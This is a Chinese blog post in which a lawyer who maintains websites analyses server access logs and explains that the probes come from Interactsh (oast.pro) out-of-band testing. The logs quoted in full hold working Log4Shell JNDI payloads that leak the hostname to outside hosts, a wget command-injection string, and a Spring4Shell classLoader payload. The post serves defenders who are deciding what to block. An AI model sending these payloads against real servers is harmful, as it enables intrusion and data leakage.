记录分享邓杰律师从事网络技术工作点点滴滴。
编者按:一、经分析web服务器,出现以下日志:114.236.1.125 - [-] [2023-06-14T07:07:08+08:00] "[-] [www.a.com] GET /?x=${jndi:ldap://${:-957}${:-583}.${hostName}.uri.ci42e559mpo23m5krkj01uiiwd7tn7rby.oast.pro/a} HTTP/1.1" 200 [Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrom
一、经分析web服务器,出现以下日志:
114.236.1.125 - [-] [2023-06-14T07:07:08+08:00] "[-] [www.a.com] GET /?x=${jndi:ldap://${:-957}${:-583}.${hostName}.uri.ci42e559mpo23m5krkj01uiiwd7tn7rby.oast.pro/a} HTTP/1.1" 200 [Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36] [- 6824 0.000 -]
49.69.183.138 - [${jndi:ldap://${:-957}${:-583}.${hostName}.xforwardedfor.ci42e559mpo23m5krkj01xu1bqhx59jwe.oast.pro}] [2023-06-14T07:07:49+08:00] "[${jndi:ldap://${:-957}${:-583}.${hostName}.referer.ci42e559mpo23m5krkj0h87hxnbjbjwjs.oast.pro}] [www.a.com] GET / HTTP/1.1" 200 [${jndi:ldap://${:-957}${:-583}.${hostName}.useragent.ci42e559mpo23m5krkj06h5ej6axass6w.oast.pro}] [- 38415 31.299 -]
117.93.58.69 - [-] [2023-06-14T08:08:49+08:00] "[-] [www.b.com] GET /?x=${jndi:ldap://${:-957}${:-583}.${hostName}.uri.ci42e559mpo23m5krkj08c3uxo7ibbtzp.oast.pro/a} HTTP/1.1" 200 [Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36] [- 6825 0.000 -]
180.126.138.228 - [${jndi:ldap://${:-957}${:-583}.${hostName}.xforwardedfor.ci42e559mpo23m5krkj0nm4tcfaeejrw1.oast.pro}] [2023-06-14T08:08:50+08:00] "[${jndi:ldap://${:-957}${:-583}.${hostName}.referer.ci42e559mpo23m5krkj08sbmois6zwa1s.oast.pro}] [www.b.com] GET / HTTP/1.1" 200 [${jndi:ldap://${:-957}${:-583}.${hostName}.useragent.ci42e559mpo23m5krkj0iczywkssyo3bf.oast.pro}] [- 28206 0.000 -]
117.93.223.101 - [-] [2023-06-14T08:23:16+08:00] "[-] [www.c.net] GET /?x=${jndi:ldap://${:-957}${:-583}.${hostName}.uri.ci42e559mpo23m5krkj0infwjqa91tibg.oast.pro/a} HTTP/1.1" 200 [Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36] [- 6332 0.000 -]
180.117.101.90 - [${jndi:ldap://${:-957}${:-583}.${hostName}.xforwardedfor.ci42e559mpo23m5krkj0u35bg4e1qq5ob.oast.pro}] [2023-06-14T08:24:05+08:00] "[${jndi:ldap://${:-957}${:-583}.${hostName}.referer.ci42e559mpo23m5krkj0wqmnd4ot49ijp.oast.pro}] [www.c.net] GET / HTTP/1.1" 200 [${jndi:ldap://${:-957}${:-583}.${hostName}.useragent.ci42e559mpo23m5krkj0xxrwetsqdg7nu.oast.pro}] [- 27454 28.667 -]
117.93.49.191 - [-] [2023-06-14T09:18:30+08:00] "[-] [www.a.com] GET /search.php?search=%22;wget+http%3A%2F%2Fci42e559mpo23m5krkj0xucn4zhzmfw9q.oast.pro%27;%22 HTTP/1.1" 404 [Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36] [- 801 0.000 -]
117.93.58.152 - [-] [2023-06-14T09:42:28+08:00] "[-] [www.b.com] GET /search.php?search=%22;wget+http%3A%2F%2Fci42e559mpo23m5krkj0ndkhqp1adwzku.oast.pro%27;%22 HTTP/1.1" 404 [Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36] [- 737 0.000 -]
221.231.28.196 - [-] [2023-06-14T13:14:43+08:00] "[-] [www.a.com] GET /?class.module.classLoader.resources.context.configFile=http://ci42e559mpo23m5krkj05jy69bdwrtgc8.oast.pro&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1" 200 [Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36] [- 6824 0.000 -]
二、经查询,http://www.oast.pro/官网,Interactsh和.oast.pro相关情况如下:
Interactsh Server
Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions.
If you notice any interactions from *.oast.pro in your logs, it's possible that someone (internal security engineers, pen-testers, bug-bounty hunters) has been testing your application.
You should investigate the sites where these interactions were generated from, and if a vulnerability exists, examine the root cause and take the necessary steps to mitigate the issue.
经谷歌翻译成中文如下:
Interactsh是一个用于检测带外交互的开源工具。它是一种旨在检测导致外部交互的漏洞的工具。
如果您在日志中发现来自*.oast.pro的任何交互,则可能有人(内部安全工程师、笔测试人员、错误赏金猎人)一直在测试您的应用程序。
您应该调查生成这些交互的站点,如果存在漏洞,请检查根本原因并采取必要的步骤来缓解问题。
三、根据以上情况,应在对.oast.pro及相应ip采取安全措施的同时,堵上任何与此相关的漏洞以提高web服务器的安全性。
以上是邓杰律师在分析网站服务器访问日志中发现的问题,供各位网站服务器维护工程师在采取屏蔽或者放行等安全措施时参考。

专注执业领域事务
全力办理委托事项
扎实维护合法权益

邓杰律师电话:13715198118
请输入您的联系电话,座机请加区号
